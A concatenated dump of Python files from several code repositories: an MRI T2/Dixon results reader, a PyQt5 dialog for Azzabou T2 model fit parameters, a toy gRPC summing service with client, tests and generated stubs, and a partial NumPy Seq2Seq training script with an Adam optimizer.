os.path.split(fn) print("resultsDir", resultsDir) print("resultsFilename", resultsFilename) resultsDirList = resultsDir.split(os.path.sep) print("resultsDirList",resultsDirList, ) sessionIndex = [ i for i,w in enumerate(resultsDirList) if "sess" in w] print("sessionIndex",sessionIndex) if len(sessionIndex): si = sessionIndex[0] print("si",si) print("resultsDirList",resultsDirList) print("resultsDirList[0]",resultsDirList[0]) # print("resultsDirList[0][-1]",resultsDirList[0][-1]) if len(resultsDirList[0])>0: if ":" == resultsDirList[0][-1]: # add path seperator if root ends in : resultsDirList[0] = resultsDirList[0]+os.path.sep print("resultsDirList[0]", resultsDirList[0]) self.root = os.path.sep.join(resultsDirList[:si-2]) self.studyName = resultsDirList[si-2] self.subject = resultsDirList[si-1] self.session = resultsDirList[si] self.imagedRegion = resultsDirList[si+1] self.protocol = 
resultsDirList[si+2] self.results = resultsDirList[si+3] self.roiType = imagedRegionType = resultsDirList[si+4] self.fitModel = resultsDirList[si+5] print("self.root",self.root) ### create directory paths to T2 and Dixon results and image path # T2_images_dirPath # dixon_images_dirPath # dixon_results_dirPath # T2_results_dirPath ## T2 image path dirpath = os.path.join(self.root,self.studyName,self.subject, self.session,self.imagedRegion,"T2") if os.path.exists(dirpath): self.T2imagesDirpath = dirpath ## dixon image path dirpath = os.path.join(self.root,self.studyName,self.subject,self.session, self.imagedRegion,"dixon") if os.path.exists(dirpath): self.dixonImagesDirpath = dirpath ## set T2 and dixon results path if self.protocol.lower() == "t2": self.T2resultsDirpath, self.dixonResultsDirpath, = self.set_results_dir("dixon", resultsDir) elif self.protocol.lower() == "dixon": self.dixonResultsDirpath, self.T2resultsDirpath, = self.set_results_dir("T2", resultsDir) print("self.dixonResultsDirpath", self.dixonResultsDirpath) print("self.T2resultsDirpath", self.T2resultsDirpath) ## set csv results path name for T2 and dixon if "T2".lower() in fn.lower(): self.T2resultsFilenameAndPath = fn resultFilenameList = [ os.path.join(self.dixonResultsDirpath,fi) for fi in os.listdir(self.dixonResultsDirpath) if "results." in fi.lower() and (".csv" in fi.lower() )] if resultFilenameList: self.dixonResultsFilenameAndPath = resultFilenameList[0] elif "dixon" in fn.lower(): self.dixonResultsFilenameAndPath = fn resultFilenameList = [ os.path.join(self.T2resultsDirpath,fi) for fi in os.listdir(self.T2ResultsDirpath) if "results." 
in fi.lower() and (".csv" in fi.lower() )] if resultFilenameList: self.T2resultsFilenameAndPath = resultFilenameList[0] def read_T2_data(self): print("read_T2_data function entered") print("self.T2resultsFilenameAndPath", self.T2resultsFilenameAndPath) if os.path.exists(self.T2resultsFilenameAndPath): print(self.T2resultsFilenameAndPath, "exists") self.t2_data_summary_df = pd.read_csv(self.T2resultsFilenameAndPath) self.T2slices = list(self.t2_data_summary_df["slice"].unique()) return(True) else: print(self.T2resultsFilenameAndPath, "not Found" ) return(False) def read_Dixon_data(self): print("read_Dixon_data function entered") print("self.dixonResultsFilenameAndPath",self.dixonResultsFilenameAndPath) if os.path.exists(self.dixonResultsFilenameAndPath): print(self.dixonResultsFilenameAndPath, "exists") self.dixon_data_summary_df = pd.read_csv(self.dixonResultsFilenameAndPath) self.dixonSlices = list(self.dixon_data_summary_df["slice"].unique()) return(True) else: print(self.dixonResultsFilenameAndPath, "not Found" ) self.dixon_data_summary_df = pd.DataFrame() return(False) def read_T2_img_hdr_files(self): if os.path.exists(self.T2MRIimageFilenameAndPath): print(self.T2MRIimageFilenameAndPath, " found") self.t2_imghdr = nibabel.load(self.T2MRIimageFilenameAndPath) image_data = self.t2_imghdr.get_data() image_data = np.flipud(image_data.swapaxes(1,0)) self.update_imageDataT2(image_data) [self.numRowsT2, self.numColsT2, self.numSlicesT2, self.numEchoesT2] = self.ImageDataT2.shape # self.img1 = np.zeros((self.numRowsT2, self.numColsT2,3), dtype=np.double) self.mriSliceIMG = np.zeros((self.numRowsT2, self.numColsT2), dtype=np.double) # self.img1[:,:,0] = self.ImageDataT2[:,:,0,0]/(self.ImageDataT2[:,:,0,0].max()*2) # self.img1[:,:,0] = self.ImageDataT2[:,:,0,0] self.mriSliceIMG = self.ImageDataT2[:,:,0,0]*1.0 self.currentEcho = 0 self.currentSlice = 0 # mainWindow.setWindowTitle(self.study_name) return(True) else: return(False) def update_imageDataT2(self, imageData): 
self.ImageDataT2 = imageData def overlayRoisOnImage(self, slice_pos, roi_data): print("Entering overlayRoisOnImage", slice_pos) print("roi_data",roi_data) if roi_data in self.t2_data_summary_df.columns: roi_image_layer = np.zeros(self.numRowsT2*self.numColsT2) t2_data_query_df = self.t2_data_summary_df.query('slice == {}'.format(str(slice_pos))) roi_image_layer[t2_data_query_df.pixel_index] = t2_data_query_df[roi_data] self.maskedROIs = np.ma.masked_where(roi_image_layer == 0, roi_image_layer) elif roi_data in self.dixon_data_summary_df.columns: # print("slice_pos", slice_pos) # print("self.T2slices.index(slice_pos)",self.T2slices.index(slice_pos)) # print("self.dixonSlices[self.T2slices.index(slice_pos)]",self.dixonSlices[self.T2slices.index(slice_pos)]) if slice_pos in self.T2slices: dixon_slice = self.dixonSlices[self.T2slices.index(slice_pos)] else: dixon_slice = slice_pos roi_image_layer = np.zeros(self.numRowsT2*self.numColsT2) #df_t2 = self.t2_data_summary_df[roi_data, 'pixel_index','roi'].groupby('slice') dixon_data_query_df = self.dixon_data_summary_df.query('slice == {}'.format(str(dixon_slice))) # roi_image_layer[dixon_data_query_df.pixels] = dixon_data_query_df[roi_data]/dixon_data_query_df[roi_data].max() roi_image_layer[dixon_data_query_df.pixel_index] = dixon_data_query_df[roi_data] # self.img1[:,:,2] = roi_image_layer.reshape((self.numRowsT2,self.numColsT2)) self.maskedROIs = np.ma.masked_where(roi_image_layer == 0, roi_image_layer) else: roi_image_layer = np.zeros(self.numRowsT2*self.numColsT2) self.maskedROIs = np.ma.masked_where(roi_image_layer == 0, roi_image_layer)
Python
375
35.482666
124
/ImageData.py
0.570474
0.557531
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'azz_fit_parameters_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
# NOTE(review): this file has clearly been hand-edited since generation
# (__init__, dialog_ok_clicked, get_fitparameters are not protoc/pyuic output),
# so targeted fixes are applied here.

from PyQt5 import QtCore, QtGui, QtWidgets


class AzzT2paramsDialog(object):
    """Dialog collecting the fit parameters for the Azzabou T2 model.

    Reads/writes the lmfit.Parameters object stored under
    lmparams['azzt2fitparams'] when the user presses OK.
    """

    def __init__(self, lmparams):
        # lmparams: dict of lmfit.Parameters keyed by model name.
        self.lmparams = lmparams
        self.params = self.lmparams['azzt2fitparams']

    def setupAzzT2paramsDialog(self, Dialog):
        """Build the widget tree (generated layout code)."""
        self.dialog = Dialog
        Dialog.setObjectName("Azzabou")
        Dialog.resize(398, 335)
        self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
        self.buttonBox.setGeometry(QtCore.QRect(230, 280, 156, 23))
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName("buttonBox")
        self.layoutWidget = QtWidgets.QWidget(Dialog)
        self.layoutWidget.setGeometry(QtCore.QRect(20, 10, 361, 252))
        self.layoutWidget.setObjectName("layoutWidget")
        self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget)
        self.gridLayout.setContentsMargins(0, 0, 0, 0)
        self.gridLayout.setObjectName("gridLayout")
        self.label_11 = QtWidgets.QLabel(self.layoutWidget)
        self.label_11.setObjectName("label_11")
        self.gridLayout.addWidget(self.label_11, 7, 0, 1, 1)
        self.label_12 = QtWidgets.QLabel(self.layoutWidget)
        self.label_12.setObjectName("label_12")
        self.gridLayout.addWidget(self.label_12, 8, 0, 1, 1)
        self.echoTimeValue = QtWidgets.QLineEdit(self.layoutWidget)
        self.echoTimeValue.setValidator(QtGui.QDoubleValidator())
        self.echoTimeValue.setObjectName("echoTimeValue")
        self.gridLayout.addWidget(self.echoTimeValue, 8, 1, 1, 1)
        self.longFatT2value = QtWidgets.QLineEdit(self.layoutWidget)
        self.longFatT2value.setValidator(QtGui.QDoubleValidator())
        self.longFatT2value.setObjectName("longFatT2value")
        self.gridLayout.addWidget(self.longFatT2value, 6, 1, 1, 1)
        self.shortFatT2value = QtWidgets.QLineEdit(self.layoutWidget)
        self.shortFatT2value.setValidator(QtGui.QDoubleValidator())
        self.shortFatT2value.setObjectName("shortFatT2value")
        self.gridLayout.addWidget(self.shortFatT2value, 7, 1, 1, 1)
        self.label_2 = QtWidgets.QLabel(self.layoutWidget)
        self.label_2.setObjectName("label_2")
        self.gridLayout.addWidget(self.label_2, 0, 2, 1, 1)
        self.label_3 = QtWidgets.QLabel(self.layoutWidget)
        self.label_3.setObjectName("label_3")
        self.gridLayout.addWidget(self.label_3, 0, 3, 1, 1)
        self.muscleT2minimum = QtWidgets.QLineEdit(self.layoutWidget)
        self.muscleT2minimum.setValidator(QtGui.QDoubleValidator())
        self.muscleT2minimum.setObjectName("muscleT2minimum")
        self.gridLayout.addWidget(self.muscleT2minimum, 1, 2, 1, 1)
        self.fatFractionMinimum = QtWidgets.QLineEdit(self.layoutWidget)
        self.fatFractionMinimum.setValidator(QtGui.QDoubleValidator())
        self.fatFractionMinimum.setObjectName("fatFractionMinimum")
        self.gridLayout.addWidget(self.fatFractionMinimum, 3, 2, 1, 1)
        self.fatFractionMaximum = QtWidgets.QLineEdit(self.layoutWidget)
        self.fatFractionMaximum.setValidator(QtGui.QDoubleValidator())
        self.fatFractionMaximum.setObjectName("fatFractionMaximum")
        self.gridLayout.addWidget(self.fatFractionMaximum, 3, 3, 1, 1)
        self.muscleFractionMinimum = QtWidgets.QLineEdit(self.layoutWidget)
        self.muscleFractionMinimum.setValidator(QtGui.QDoubleValidator())
        self.muscleFractionMinimum.setObjectName("muscleFractionMinimum")
        self.gridLayout.addWidget(self.muscleFractionMinimum, 2, 2, 1, 1)
        self.optimizeMuscleFraction = QtWidgets.QCheckBox(self.layoutWidget)
        self.optimizeMuscleFraction.setText("")
        self.optimizeMuscleFraction.setChecked(True)
        self.optimizeMuscleFraction.setObjectName("optimizeMuscleFraction")
        self.gridLayout.addWidget(self.optimizeMuscleFraction, 2, 4, 1, 1)
        self.muscleFractionMaximum = QtWidgets.QLineEdit(self.layoutWidget)
        self.muscleFractionMaximum.setValidator(QtGui.QDoubleValidator())
        self.muscleFractionMaximum.setObjectName("muscleFractionMaximum")
        self.gridLayout.addWidget(self.muscleFractionMaximum, 2, 3, 1, 1)
        self.optimizeFatFraction = QtWidgets.QCheckBox(self.layoutWidget)
        self.optimizeFatFraction.setText("")
        self.optimizeFatFraction.setChecked(True)
        self.optimizeFatFraction.setObjectName("optimizeFatFraction")
        self.gridLayout.addWidget(self.optimizeFatFraction, 3, 4, 1, 1)
        self.label_7 = QtWidgets.QLabel(self.layoutWidget)
        self.label_7.setObjectName("label_7")
        self.gridLayout.addWidget(self.label_7, 3, 0, 1, 1)
        self.label_8 = QtWidgets.QLabel(self.layoutWidget)
        self.label_8.setObjectName("label_8")
        self.gridLayout.addWidget(self.label_8, 4, 0, 1, 1)
        self.optimizeMuscleT2 = QtWidgets.QCheckBox(self.layoutWidget)
        self.optimizeMuscleT2.setText("")
        self.optimizeMuscleT2.setChecked(True)
        self.optimizeMuscleT2.setObjectName("optimizeMuscleT2")
        self.gridLayout.addWidget(self.optimizeMuscleT2, 1, 4, 1, 1)
        self.fatFractionLongT2value = QtWidgets.QLineEdit(self.layoutWidget)
        self.fatFractionLongT2value.setValidator(QtGui.QDoubleValidator())
        self.fatFractionLongT2value.setObjectName("fatFractionLongT2value")
        self.gridLayout.addWidget(self.fatFractionLongT2value, 4, 1, 1, 1)
        self.label_4 = QtWidgets.QLabel(self.layoutWidget)
        self.label_4.setObjectName("label_4")
        self.gridLayout.addWidget(self.label_4, 0, 4, 1, 1)
        self.muscleT2value = QtWidgets.QLineEdit(self.layoutWidget)
        # FIX: this was the only numeric field without a validator, so arbitrary
        # text could reach float() in get_fitparameters and raise there.
        self.muscleT2value.setValidator(QtGui.QDoubleValidator())
        self.muscleT2value.setObjectName("muscleT2value")
        self.gridLayout.addWidget(self.muscleT2value, 1, 1, 1, 1)
        self.fatFractionShortT2value = QtWidgets.QLineEdit(self.layoutWidget)
        self.fatFractionShortT2value.setValidator(QtGui.QDoubleValidator())
        self.fatFractionShortT2value.setObjectName("fatFractionShortT2value")
        self.gridLayout.addWidget(self.fatFractionShortT2value, 5, 1, 1, 1)
        self.label_5 = QtWidgets.QLabel(self.layoutWidget)
        self.label_5.setObjectName("label_5")
        self.gridLayout.addWidget(self.label_5, 1, 0, 1, 1)
        self.label_6 = QtWidgets.QLabel(self.layoutWidget)
        self.label_6.setObjectName("label_6")
        self.gridLayout.addWidget(self.label_6, 2, 0, 1, 1)
        self.label_9 = QtWidgets.QLabel(self.layoutWidget)
        self.label_9.setObjectName("label_9")
        self.gridLayout.addWidget(self.label_9, 5, 0, 1, 1)
        self.muscleT2maximum = QtWidgets.QLineEdit(self.layoutWidget)
        self.muscleT2maximum.setValidator(QtGui.QDoubleValidator())
        self.muscleT2maximum.setObjectName("muscleT2maximum")
        self.gridLayout.addWidget(self.muscleT2maximum, 1, 3, 1, 1)
        self.label_10 = QtWidgets.QLabel(self.layoutWidget)
        self.label_10.setObjectName("label_10")
        self.gridLayout.addWidget(self.label_10, 6, 0, 1, 1)
        self.muscleFractionValue = QtWidgets.QLineEdit(self.layoutWidget)
        self.muscleFractionValue.setValidator(QtGui.QDoubleValidator())
        self.muscleFractionValue.setObjectName("muscleFractionValue")
        self.gridLayout.addWidget(self.muscleFractionValue, 2, 1, 1, 1)
        self.label = QtWidgets.QLabel(self.layoutWidget)
        self.label.setObjectName("label")
        self.gridLayout.addWidget(self.label, 0, 1, 1, 1)
        self.fatFractionValue = QtWidgets.QLineEdit(self.layoutWidget)
        self.fatFractionValue.setValidator(QtGui.QDoubleValidator())
        self.fatFractionValue.setObjectName("fatFractionValue")
        self.gridLayout.addWidget(self.fatFractionValue, 3, 1, 1, 1)

        self.retranslateUi(Dialog)
        # OK routes through dialog_ok_clicked so the parameters are harvested
        # and validated before the dialog is accepted.
        self.buttonBox.accepted.connect(self.dialog_ok_clicked)
        self.buttonBox.rejected.connect(Dialog.reject)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Install all user-visible strings and default field values."""
        _translate = QtCore.QCoreApplication.translate
        # FIX: window title typo "Azzabout" -> "Azzabou" (the model name used
        # everywhere else in this dialog).
        Dialog.setWindowTitle(_translate("Azzabou", "Azzabou T2 model"))
        self.label_11.setText(_translate("Azzabou", "Short Fat T<sub>2</sub> (ms)"))
        self.label_12.setText(_translate("Azzabou", "Echo Time (ms)"))
        self.echoTimeValue.setText(_translate("Azzabou", "10.0"))
        self.longFatT2value.setText(_translate("Azzabou", "250.0"))
        self.shortFatT2value.setText(_translate("Azzabou", "43.0"))
        self.label_2.setText(_translate("Azzabou", "minimum"))
        self.label_3.setText(_translate("Azzabou", "maximum"))
        self.muscleT2minimum.setText(_translate("Azzabou", "0.0"))
        self.fatFractionMinimum.setText(_translate("Azzabou", "0.0"))
        self.fatFractionMaximum.setText(_translate("Azzabou", "10.0"))
        self.muscleFractionMinimum.setText(_translate("Azzabou", "0.0"))
        self.muscleFractionMaximum.setText(_translate("Azzabou", "10.0"))
        self.label_7.setText(_translate("Azzabou", "Fat Fraction"))
        self.label_8.setText(_translate("Azzabou", "Fat Fraction (Long T<sub>2</sub>)"))
        self.fatFractionLongT2value.setText(_translate("Azzabou", "0.6"))
        self.label_4.setText(_translate("Azzabou", "optimized"))
        self.muscleT2value.setText(_translate("Azzabou", "35.0"))
        self.fatFractionShortT2value.setText(_translate("Azzabou", "0.4"))
        self.label_5.setText(_translate("Azzabou", "Muscle T<sub>2</sub> (ms)"))
        self.label_6.setText(_translate("Azzabou", "Muscle Fraction"))
        self.label_9.setText(_translate("Azzabou", "Fat Fraction (Short T<sub>2</sub>)"))
        self.muscleT2maximum.setText(_translate("Azzabou", "100.0"))
        self.label_10.setText(_translate("Azzabou", "Long Fat T<sub>2</sub> (ms)"))
        self.muscleFractionValue.setText(_translate("Azzabou", "0.8"))
        self.label.setText(_translate("Azzabou", "value"))
        self.fatFractionValue.setText(_translate("Azzabou", "0.2"))

    def dialog_ok_clicked(self):
        """Harvest the fit parameters; accept the dialog only on success."""
        print("dialog_ok_clicked")
        self.dialog.setResult(1)
        worked = self.get_fitparameters()
        if worked:
            self.params.pretty_print()
            self.dialog.accept()
        # On failure the dialog stays open so the user can correct the input.

    def get_fitparameters(self):
        """Copy the widget values into the lmfit Parameters object.

        Returns True on success; False if parsing failed or the user disabled
        optimization of every free parameter (nothing left to fit).
        """
        print("self.optimizeFatFraction.isChecked()", self.optimizeFatFraction.isChecked())
        worked = True
        try:
            self.params.add(name='T2muscle', value=float(self.muscleT2value.text()),
                            min=float(self.muscleT2minimum.text()),
                            max=float(self.muscleT2maximum.text()),
                            vary=self.optimizeMuscleT2.isChecked())
            self.params.add(name='Amuscle', value=float(self.muscleFractionValue.text()),
                            min=float(self.muscleFractionMinimum.text()),
                            max=float(self.muscleFractionMaximum.text()),
                            vary=self.optimizeMuscleFraction.isChecked())
            self.params.add(name='Afat', value=float(self.fatFractionValue.text()),
                            min=float(self.fatFractionMinimum.text()),
                            max=float(self.fatFractionMaximum.text()),
                            vary=self.optimizeFatFraction.isChecked())
            # Fixed (non-varying) model constants.
            self.params.add(name='c_l', value=float(self.fatFractionLongT2value.text()), vary=False)
            self.params.add(name='c_s', value=float(self.fatFractionShortT2value.text()), vary=False)
            self.params.add(name='t2_fl', value=float(self.longFatT2value.text()), vary=False)
            self.params.add(name='t2_fs', value=float(self.shortFatT2value.text()), vary=False)
            self.params.add(name='echo', value=float(self.echoTimeValue.text()), vary=False)
            buttonsUnChecked = [not self.optimizeFatFraction.isChecked(),
                                not self.optimizeMuscleFraction.isChecked(),
                                not self.optimizeMuscleT2.isChecked()]
            print(buttonsUnChecked)
            if all(buttonsUnChecked):
                # A fit with zero free parameters is meaningless.
                print("all buttons unchecked")
                worked = False
            self.lmparams['azzt2fitparams'] = self.params
        # FIX: was a bare `except:` which also swallowed SystemExit and
        # KeyboardInterrupt and hid the error cause.
        except Exception as exc:
            print("exception occurred:", exc)
            worked = False
        return worked


if __name__ == "__main__":
    import sys
    import lmfit as lm

    # Build default parameter sets for both T2 models so the dialog can be
    # exercised stand-alone.
    lmparams = {}
    epgt2fitparams = lm.Parameters()
    azzt2fitparams = lm.Parameters()
    epgt2fitparams.add('T2fat', value=180.0, min=0, max=5000, vary=False)
    epgt2fitparams.add('T2muscle', value=35, min=0, max=100, vary=True)
    epgt2fitparams.add('Afat', value=0.20, min=0, max=10, vary=True)
    epgt2fitparams.add('Amuscle', value=0.80, min=0, max=10, vary=True)
    epgt2fitparams.add('T1fat', value=365.0, vary=False)
    epgt2fitparams.add('T1muscle', value=1400, vary=False)
    epgt2fitparams.add('echo', value=10.0, vary=False)
    # (name, value, vary, min, max, expr) tuples.
    azzt2fitparams.add_many(('Afat', 60.0, True, 0, 250, None),
                            ('Amuscle', 40.0, True, 0, 250, None),
                            ('T2muscle', 40.0, True, 0, 100, None),
                            ('c_l', 0.55, False, 0, 2000, None),
                            ('c_s', 0.45, False, 0, 2000, None),
                            ('t2_fl', 250.0, False, 0, 2000, None),
                            ('t2_fs', 43.0, False, 0, 2000, None),
                            ('echo', 10.0, False, 0, 2000, None))
    lmparams['epgt2fitparams'] = epgt2fitparams
    lmparams['azzt2fitparams'] = azzt2fitparams

    app = QtWidgets.QApplication(sys.argv)
    Azzabou = QtWidgets.QDialog()
    ui = AzzT2paramsDialog(lmparams)
    ui.setupAzzT2paramsDialog(Azzabou)
    Azzabou.show()
    sys.exit(app.exec_())
Python
302
47.052979
106
/azzT2paramsDialog.py
0.634854
0.604279
mgh35/lab-grpc
refs/heads/master
from concurrent import futures
from generated import summer_pb2, summer_pb2_grpc
import grpc
import logging


class SummerServicer(summer_pb2_grpc.SummerServicer):
    """Summer service implementation: totals the numbers in a request."""

    def Sum(self, request: summer_pb2.ToSum, context):
        """Return a Summed message carrying the total of request.values."""
        logging.info("SummerServicer.Sum(%s)", request)
        return summer_pb2.Summed(sum=sum(request.values))


def serve():
    """Run the Summer gRPC server on port 50051 until it is terminated."""
    pool = futures.ThreadPoolExecutor(max_workers=10)
    server = grpc.server(pool)
    summer_pb2_grpc.add_SummerServicer_to_server(SummerServicer(), server)
    server.add_insecure_port('[::]:50051')
    server.start()
    server.wait_for_termination()


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    serve()
Python
26
25.807692
68
/summer-grpc/server.py
0.691535
0.672884
mgh35/lab-grpc
refs/heads/master
from generated.summer_pb2 import ToSum
import pytest

# (values, expected-sum) pairs: empty request, one element, two elements.
_CASES = [
    ([], 0),
    ([1.0], 1.0),
    ([1.0, 1.0], 2.0),
]


@pytest.mark.parametrize(["values", "expected"], _CASES)
def test_some(grpc_stub, values, expected):
    """The Sum RPC must return the arithmetic sum of the request values."""
    summed = grpc_stub.Sum(ToSum(values=values))
    assert summed.sum == pytest.approx(expected)
Python
12
24.75
50
/summer-grpc/test_server.py
0.63754
0.598706
mgh35/lab-grpc
refs/heads/master
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! import grpc from generated import summer_pb2 as generated_dot_summer__pb2 class SummerStub(object): """Missing associated documentation comment in .proto file""" def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.Sum = channel.unary_unary( '/Summer/Sum', request_serializer=generated_dot_summer__pb2.ToSum.SerializeToString, response_deserializer=generated_dot_summer__pb2.Summed.FromString, ) class SummerServicer(object): """Missing associated documentation comment in .proto file""" def Sum(self, request, context): """Missing associated documentation comment in .proto file""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_SummerServicer_to_server(servicer, server): rpc_method_handlers = { 'Sum': grpc.unary_unary_rpc_method_handler( servicer.Sum, request_deserializer=generated_dot_summer__pb2.ToSum.FromString, response_serializer=generated_dot_summer__pb2.Summed.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'Summer', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) # This class is part of an EXPERIMENTAL API. class Summer(object): """Missing associated documentation comment in .proto file""" @staticmethod def Sum(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/Summer/Sum', generated_dot_summer__pb2.ToSum.SerializeToString, generated_dot_summer__pb2.Summed.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata)
Python
64
34.203125
91
/summer-grpc/generated/summer_pb2_grpc.py
0.633822
0.630271
mgh35/lab-grpc
refs/heads/master
from generated import summer_pb2, summer_pb2_grpc
import grpc
import sys
import typing


def run(values: typing.List[float]):
    """Send *values* to the Summer service on localhost:50051 and print the reply.

    FIX: the annotation was ``List[int]``, but the ``__main__`` block below
    builds the list with ``float(...)``, so the real contract is floats.
    """
    with grpc.insecure_channel('localhost:50051') as channel:
        stub = summer_pb2_grpc.SummerStub(channel)
        summed = stub.Sum(summer_pb2.ToSum(values=values))
        print(summed)


if __name__ == "__main__":
    # Parse command-line arguments as floats before sending them for summing.
    values = [float(_) for _ in sys.argv[1:]]
    run(values)
Python
17
23.117647
61
/summer-grpc/client.py
0.658537
0.634146
mgh35/lab-grpc
refs/heads/master
import pytest


@pytest.fixture(scope='module')
def grpc_add_to_server():
    """Registration hook pytest-grpc uses to attach the servicer to the test server."""
    from generated import summer_pb2_grpc
    return summer_pb2_grpc.add_SummerServicer_to_server


@pytest.fixture(scope='module')
def grpc_servicer():
    """A SummerServicer instance served by the in-process test server."""
    from server import SummerServicer
    servicer = SummerServicer()
    return servicer


@pytest.fixture(scope='module')
def grpc_stub_cls(grpc_channel):
    """Stub class pytest-grpc instantiates against the test channel."""
    from generated import summer_pb2_grpc
    return summer_pb2_grpc.SummerStub
Python
19
22.578947
70
/summer-grpc/conftest.py
0.754464
0.75
yukojima424/deliverable
refs/heads/master
# Attention- and GRU-based Seq2Seq.
# Overview: a Seq2Seq model extended with an Attention layer, built on GRU
# cells instead of plain RNN or LSTM units.
import sys
sys.path.append('../kojimayu')
import numpy as np
import matplotlib.pyplot as plt
import time
import pickle
import os
import os.path

# Bidirectional character <-> id maps, filled by _update_vocab().
id_to_char = {}
char_to_id = {}


def _update_vocab(txt):
    """Register every unseen character of *txt* in the vocabulary maps."""
    chars = list(txt)
    for i, char in enumerate(chars):
        if char not in char_to_id:
            tmp_id = len(char_to_id)
            char_to_id[char] = tmp_id
            id_to_char[tmp_id] = char


def load_data(file_name='date.txt', seed=1984):
    """Load question/answer pairs, encode them as id arrays, and split 80/20.

    Each line of the file is `question_answer`; '_' separates the two parts.
    Returns ((x_train, t_train), (x_test, t_test)) or None if the file is
    missing. Local path is hard-coded for the author's environment.
    """
    file_path = '../kojimayu/date/' + file_name
    if not os.path.exists(file_path):
        print('No file: %s' % file_name)
        return None

    questions, answers = [], []
    # FIX: use a context manager so the file handle is closed (was left open).
    with open(file_path, 'r') as f:
        for line in f:
            idx = line.find('_')
            questions.append(line[:idx])
            answers.append(line[idx:-1])

    for i in range(len(questions)):
        q, a = questions[i], answers[i]
        _update_vocab(q)
        _update_vocab(a)

    # Inputs (x) and targets (t); all lines are assumed to be fixed-width.
    # FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24 -- the
    # builtin `int` is the documented equivalent.
    x = np.zeros((len(questions), len(questions[0])), dtype=int)
    t = np.zeros((len(questions), len(answers[0])), dtype=int)
    for i, sentence in enumerate(questions):
        x[i] = [char_to_id[c] for c in list(sentence)]
    for i, sentence in enumerate(answers):
        t[i] = [char_to_id[c] for c in list(sentence)]

    # Shuffle (reproducibly when a seed is given).
    indices = np.arange(len(x))
    if seed is not None:
        np.random.seed(seed)
    np.random.shuffle(indices)
    x = x[indices]
    t = t[indices]

    # 80% train / 20% test split.
    split_at = len(x) - len(x) // 5
    (x_train, x_test) = x[:split_at], x[split_at:]
    (t_train, t_test) = t[:split_at], t[split_at:]
    return (x_train, t_train), (x_test, t_test)


def get_vocab():
    """Return the (char_to_id, id_to_char) maps built by load_data()."""
    return char_to_id, id_to_char


class Adam:
    """Adam optimizer (bias-corrected via the lr_t rescaling)."""

    def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
        self.lr = lr
        self.beta1 = beta1
        self.beta2 = beta2
        self.iter = 0
        self.m = None  # first-moment estimates, lazily initialized
        self.v = None  # second-moment estimates, lazily initialized

    def update(self, params, grads):
        """Update *params* in place from *grads* (parallel lists of arrays)."""
        if self.m is None:
            self.m, self.v = [], []
            for param in params:
                self.m.append(np.zeros_like(param))
                self.v.append(np.zeros_like(param))

        self.iter += 1
        lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)

        for i in range(len(params)):
            self.m[i] += (1 - self.beta1) * (grads[i] - self.m[i])
            self.v[i] += (1 - self.beta2) * (grads[i]**2 - self.v[i])
            params[i] -= lr_t * self.m[i] / (np.sqrt(self.v[i]) + 1e-7)


class Trainer:
    """Mini-batch training loop with periodic loss reporting."""

    def __init__(self, model, optimizer):
        self.model = model
        self.optimizer = optimizer
        self.loss_list = []
        self.eval_interval = None
        self.current_epoch = 0

    def fit(self, x, t, max_epoch=10, batch_size=32, max_grad=None, eval_interval=20):
        """Train on (x, t); clip gradients to *max_grad* when given."""
        data_size = len(x)
        max_iters = data_size // batch_size
        self.eval_interval = eval_interval
        model, optimizer = self.model, self.optimizer
        total_loss = 0
        loss_count = 0

        start_time = time.time()
        for epoch in range(max_epoch):
            # Reshuffle the data every epoch.
            idx = np.random.permutation(np.arange(data_size))
            x = x[idx]
            t = t[idx]

            for iters in range(max_iters):
                batch_x = x[iters * batch_size:(iters+1) * batch_size]
                batch_t = t[iters * batch_size:(iters+1) * batch_size]

                # Forward/backward, collapse shared weights, then update.
                loss = model.forward(batch_x, batch_t)
                model.backward()
                params, grads = remove_duplicate(model.params, model.grads)
                if max_grad is not None:
                    clip_grads(grads, max_grad)  # gradient-explosion guard
                optimizer.update(params, grads)
                total_loss += loss
                loss_count += 1

                # Periodic progress report.
                if (eval_interval is not None) and (iters % eval_interval) == 0:
                    avg_loss = total_loss / loss_count
                    elapsed_time = time.time() - start_time
                    print('| epoch %d | iter %d / %d | time %d[s] | loss %.2f'
                          % (self.current_epoch + 1, iters + 1, max_iters, elapsed_time, avg_loss))
                    self.loss_list.append(float(avg_loss))
                    total_loss, loss_count = 0, 0

            self.current_epoch += 1

    def plot(self, ylim=None):
        """Plot the recorded training loss curve."""
        x = np.arange(len(self.loss_list))
        if ylim is not None:
            plt.ylim(*ylim)
        plt.plot(x, self.loss_list, label='train')
        plt.xlabel('iterations (x' + str(self.eval_interval) + ')')
        plt.ylabel('loss')
        plt.show()


def clip_grads(grads, max_norm):
    """Rescale *grads* in place so their global L2 norm is at most max_norm."""
    total_norm = 0
    for grad in grads:
        total_norm += np.sum(grad ** 2)
    total_norm = np.sqrt(total_norm)

    rate = max_norm / (total_norm + 1e-6)
    if rate < 1:
        for grad in grads:
            grad *= rate


def remove_duplicate(params, grads):
    """Merge parameters that are shared (identical objects or transposes).

    Gradients of merged entries are summed; returns pruned copies of the
    lists (the array contents themselves are not copied).
    """
    params, grads = params[:], grads[:]

    while True:
        find_flg = False
        L = len(params)

        for i in range(0, L - 1):
